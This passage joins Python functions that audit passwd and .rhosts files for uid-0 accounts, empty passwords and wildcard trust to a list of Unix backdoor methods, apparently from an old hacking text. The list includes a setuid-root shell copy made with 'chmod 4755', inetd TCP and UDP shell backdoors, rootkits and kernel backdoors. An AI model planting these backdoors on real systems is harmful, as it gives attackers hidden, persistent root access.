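    """Return (severity, subject, reason) findings for a passwd file."""
    findings = []
    entries, malformed = parse_passwd(text)
    for lineno, _ in malformed:
        findings.append(("warn", "line %d" % lineno, "not 7 fields with numeric uid/gid"))
    for name, pw, uid, gid, _, _, _ in entries:
        if uid == 0 and name != "root":
            findings.append(("high", name, "uid 0 account other than root"))
        if pw == "":
            findings.append(("high", name, "empty password field, no password required"))
        if gid == 0 and name != "root":
            findings.append(("medium", name, "primary group 0"))
    return findings


def audit_rhosts(text):
    """Flag .rhosts lines that trust every host and/or every user."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+" and user == "+":
            findings.append(("high", lineno, "any user from any host, no password"))
        elif host == "+":
            findings.append(("high", lineno, "any host trusted"))
        elif user == "+":
            findings.append(("high", lineno, "any user trusted from %s" % host))
    return findings
```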
- setuid backdoor
As explained in chapter 2, copy a shell, set setuid on it, and use it as a backdoor.

    -r-sr-xr-x   3 root     root    88620 1997년 7월 16일 /bin/hacker

Change the mode with root privileges: chmod 4755 <filename>

- TCP shell backdoor
A backdoor that opens a shell port (TCP) in inetd.conf and the services file and connects to it.

- UDP shell backdoor
Firewalls don't block UDP packets because of the DNS service. Using that point, a UDP shell backdoor can pass straight through.

- Rootkit
A program that installs backdoor programs automatically.

- Kernel backdoor
Modifies the kernel itself to make a backdoor. An advanced backdoor method that is almost impossible to detect.

References
internet hacking document
security advisory
8lgm advisory